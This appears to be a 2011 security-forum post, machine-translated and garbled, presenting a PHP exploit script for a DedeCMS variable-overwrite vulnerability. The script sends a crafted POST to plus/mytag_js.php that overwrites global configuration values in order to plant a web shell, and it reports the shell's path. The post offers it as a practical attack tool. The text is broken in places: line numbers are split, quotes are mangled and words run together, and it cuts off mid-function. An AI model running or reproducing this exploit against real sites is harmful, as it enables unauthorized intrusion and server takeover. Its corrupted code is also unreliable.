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HistorySep 22, 2011 - 12:00 a.m.

dede variables covering 0day getshell a exp-vulnerability warning-the black bar safety net


Author: the Black kid

dede recently the explosion of the cave, but the exp is also pretty practical huh!

0 1 #! usr/bin/php-w

0 2 <? php

0 3 error_reporting(E_ERROR);

0 4 set_time_limit(0);

0 5 print_r(’

0 6 DEDEcms Variable Coverage

0 7 Exploit Author:

0 8 );

0 9 echo"\r\n";

1 0 if($argv[2]==null){

1 1 print_r(’

1 2 ±--------------------------------------------------------------------------+

1 3 Usage: php '.$ argv[0].'url aid path

1 4 aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/

1 5 Example:

1 6 php ‘.$ argv[0].’ 1 old

1 7 ±--------------------------------------------------------------------------+

1 8 ');

1 9 exit;

2 0 }

2 1 $url=$argv[1];

2 2 $aid=$argv[2];

2 3 $path=$argv[3];

2 4 $exp=Getshell($url,$aid,$path);

2 5 if(strpos($exp,“OK”)>1 2){

2 6 echo"[*] Exploit Success \n";

2 7 if($aid==1)echo"[*] Shell:“.$ url.”/$ path/data/cache/fuck. php\n";

2 8

2 9 if($aid==2)echo"[*] Shell:“.$ url.”/$ path/fuck. php\n";

3 0

3 1 if($aid==3)echo"[*] Shell:“.$ url.”/$ path/plus/fuck. php\n";

3 2

3 3 }else{

3 4 echo"[*] Exploit Failed \n";

3 5 }

3 6

3 7

3 8 functionGetshell($url,$aid,$path){

3 9 $id=$aid;

4 0 $host=$url;

4 1 $port=“8 0”;

4 2 $content=“doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js. php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=”;

4 3 $data= “POST /$path/plus/mytag_js. php? aid=”.$ id." HTTP/1.1\r\n";

4 4 $data.= “Host: “.$ host.”\ r\n”;

4 5 $data.= “User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/2 0 1 0 0 1 0 1 For Firefox/5.0.1\r\n”;

4 6 $data.= “Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8\r\n”;

4 7 $data.= “Accept-Language: EN-us,EN;q=0.5\r\n”;

4 8 //$data .= “Accept-Encoding: gzip,deflate\r\n”;

4 9 $data.= “Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n”;

5 0 $data.= “Connection: keep-alive\r\n”;

5 1 $data.= “Content-Type: application/x-www-form-urlencoded\r\n”;

5 2 $data.= “Content-Length: “. strlen($content).”\ r\n\r\n”;

5 3 $data.= $content.“\ r\n”;

5 4 $ock=fsockopen($host,$port);

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